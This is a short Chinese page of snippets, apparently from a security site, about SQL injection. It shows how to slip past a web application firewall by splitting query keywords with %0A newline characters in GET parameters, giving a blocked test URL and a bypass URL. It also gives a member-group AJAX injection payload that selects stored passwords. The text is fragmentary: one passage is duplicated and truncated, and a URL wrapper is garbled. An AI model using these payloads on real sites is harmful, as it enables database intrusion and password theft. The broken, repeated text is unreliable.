GET参数SQL注入%0A换行污染绕过
绕过描述: 在GET请求时,将URL的SQL注入关键字用%0A分隔,%0A是换行符,在mysql中可以正常执行。 测试方法: 请求测试url:https://www.webshell.cc/1.php?id=1%20union%20select%201,2,3,4 — 被拦截 请求测试url:https://www.webshell.cc/1.php?id=-9%0Aun...
绕过描述: 在GET请求时,将URL的SQL注入关键字用%0A分隔,%0A是换行符,在mysql中可以正常执行。 测试方法: 请求测试url:https://www.webshell.cc/1.php?id=1%20union%20select%201,2,3,4 — 被拦截 请求测试url:https://www.webshell.cc/1.php?id=-9%0Aun...
https://www.webshell.cc/member/ajax_membergroup.php?[url=mailto:00.&action=post&membergroup=@%60]action=post&membergroup=@`'[/url]` Union select pwd from ` where 1 or ` http://www.webshell....